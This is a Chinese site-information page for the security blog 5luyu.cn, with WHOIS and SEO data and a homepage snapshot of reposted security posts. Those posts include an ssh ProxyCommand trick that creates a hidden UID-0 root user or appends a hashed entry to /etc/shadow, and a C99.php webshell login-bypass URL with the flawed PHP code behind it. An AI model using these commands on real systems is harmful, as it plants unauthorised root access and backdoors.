网站综合信息 5luyu.cn
    • 标题:
    • 陆羽's Blog - 陆羽,茶圣,茶叶,网络安全,信息安全 
    • 关键字:
    • 原创文章 转载文章 
    • 描述:
    • 陆羽,茶圣,茶叶,网络安全,信息安全 
    • 域名信息
    • 注册日期:  到期时间:
      邮箱:5linwei  电话:
      注册商:北京新网互联科技有限公司 
    • 备案信息
    • 备案号: 
    网站收录SEO数据
    • 搜索引擎
    • 收录量
    • 反向链接
    • 其他
    • 百度
    • 0  
    • 90  
    • 快照:2013-06-24  
    • Google
    • 0  
    • 0  
    • pr:3  
    • 雅虎
    • 0  
    •  
    •  
    • 搜搜
    • 0  
    •  
    •  
    • 搜狗
    • 0  
    •  
    • 评级:1/10  
    • 360搜索
    • 0  
    •  
    •  
    域名流量Alexa排名
    •  
    • 一周平均
    • 一个月平均
    • 三个月平均
    • Alexa全球排名
    • -  
    • 平均日IP
    • 日总PV
    • 人均PV(PV/IP比例)
    • 反向链接
    • dmoz目录收录
    • -  
    • 流量走势图
    域名注册Whois信息

    5luyu.cn

    注 册 商: 北京新网互联科技有限公司
    注册邮箱: 5linwei

    获取时间: 2016年03月04日 15:17:24
    Domain Name: 5luyu.cn
    ROID: 20070313s10001s34385155-cn
    Domain Status: ok
    Registrant ID: ct603uvo7czj3ql
    Registrant: 赏金猎手技术联盟
    Registrant Contact Email: 5linwei
    Sponsoring Registrar: 北京新网互联科技有限公司
    Name Server: f1g1ns1.dnspod.net
    Name Server: f1g1ns2.dnspod.net
    Registration Time: 2007-03-13 12:29:38
    Expiration Time: 2016-03-13 12:29:38
    DNSSEC: unsigned
    其他后缀域名
    • 顶级域名
    • 相关信息
    网站首页快照(纯文字版)
    抓取时间:2016年10月09日 01:14:51
    网址:http://5luyu.cn/
    标题:陆羽's Blog - 陆羽,茶圣,茶叶,网络安全,信息安全
    关键字:原创文章,转载文章
    描述:陆羽,茶圣,茶叶,网络安全,信息安全
    主体:
    陆羽's Blog想要飞的更高,就要把地平线忘掉!Feed Rss博客归档标签链接登陆AirHopper:断网状态下黑客使用FM信号监控电脑信息(含视频)No Comments| 转载文章| by 陆羽 | 224 Views.| 2014-11-02, 11:22 PM据美国科技新闻网站“瘾科技”去年底报道,德国Fraunhofer通信研究所的专家,曾经开发了一个用于概念验证的恶意攻击程序,安装在不同电脑上的多个恶意程序,可以利用扬声器和麦克风相互之间“沟通数据”,这些电脑无需存在于同一个局域网中,只需要相互距离不超过20米即可相互通信。http://bobao.360.cn/news/detail/730.html» 阅读全文阅读全文关键词: 黑客,  视频,  hackchkrootkit local rootNo Comments| 转载文章| by 陆羽 | 1716 Views.| 2014-08-01, 11:18 AM发布地址CVE-2014-0476在一个执行的地方没有加 引号保护 导致可以执行 程序» 阅读全文阅读全文关键词: root,  提权突破用户命令限制,添加root权限无限制用户No Comments| 转载文章| by 陆羽 | 1197 Views.| 2014-07-31, 3:45 PM在实际渗透场景中,有很多网络设备我们拿到了root权限后ssh登陆发现有命令执行限制,这是因为ssh接口提供了一个特殊的受限制的命令外壳程序,类似busybox的感觉,他可以允许root用户对设备进行配置处理,但是不允许进行命令交互,所以相当于我们拿到的只是一个鸡肋的root用户,为了突破这种限制,我们有特别的姿势因为开放了ssh服务,所以我们可以使用scp,但是scp是无法创建目录的,所以我们想到的第一个办法是到用户目录的.ssh下,上传公钥,然后登陆到系统无需密码,事实证明可以成功登陆,但是登陆的用户的shell默认还是在这个受限的外壳下,命令交互依旧不成功那如何逃逸这种限制?比较好玩儿,ssh给我们提供了一个可以按照配置预期执行命令的功能,在$HOME/.ssh/ config中进行配置,我们可以达到这样的效果我们在配置文件中预期执行添加一个新的root用户,UID为0且无限制执行命令,以此来逃逸网络设备的限制问题config内容如下:host ztzsb          #随便写一个host名称hostname ip          #填写当前ipuser root     #填写当前受限用户#ProxyCommand /bin/bash %h %pProxyCommand useradd -p `openssl passwd -1 -salt 'mujj' redrain` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/redrain redrain#或者echo一个到/etc/shadow#ProxyCommand echo "redrain:$1$mujj$NIovcyWTUzr76qHvsju0v.:10000:0:99999:7:::" >> /etc/shadow此时,当我们使用内置的slogin就会触发这个配置只需要scp吧这个配置文件传到我们刚才受限的用户目录的.ssh/下,登陆这个受限用户后执行slogin -N ztzsb就会执行配置中的命令~阅读全文关键词: root,  提权C99.PHP webshell 绕过登陆密码漏洞No Comments| 转载文章| by 陆羽 | 1968 Views.| 2014-06-26, 12:06 PMfrom:http://thehackerblog.com/every-c99-php-shell-is-backdoored-aka-free-shells/C99.php存在一个漏洞可以绕过登陆密码直接登陆的漏洞。http://127.0.0.1/c99.php?c99shcook[login]=0可直接登陆。@extract($_REQUEST["c99shcook"]);变量覆盖if ($login) { if (empty($md5_pass)) { $md5_pass = md5($pass); } if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) { if ($login_txt === false) { $login_txt = ""; } elseif (empty($login_txt)) { $login_txt = strip_tags(ereg_replace(" |<br>", " ", $donated_html)); } header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\""); header("HTTP/1.0 401 Unauthorized"); exit($accessdeniedmess); } }阅读全文关键词: 绕过,  密码,  漏洞,  webshell,  php360网络安全攻防实验室招聘启事4 Comments| 原创文章| by 陆羽 | 5715 Views.| 2014-02-27, 3:23 PM360办公区照片:http://yunpan.cn/Q4H2yIfeBezKw招聘岗位:信息安全工程师安全技术研究员安全开发工程师» 阅读全文阅读全文PHP Backdoors: Hidden With Clever Use of Extract FunctionNo Comments| 转载文章| by 陆羽 | 5593 Views.| 2014-02-19, 10:00 AMWhen a site gets compromised, one thing we know for sure is that attackers love to leave malware that allows them access back to the site; this type of malware is called a backdoor. This type of malware was named this because it allows for remote control of a compromised website in a way that bypasses appropriate authentication methods. You can update your site, change passwords, along with any of your admin procedures, and the backdoor 

    © 2010 - 2020 网站综合信息查询 同IP网站查询 相关类似网站查询 网站备案查询网站地图 最新查询 最近更新 优秀网站 热门网站 全部网站 同IP查询 备案查询

    2024-05-02 14:15, Process in 0.0065 second.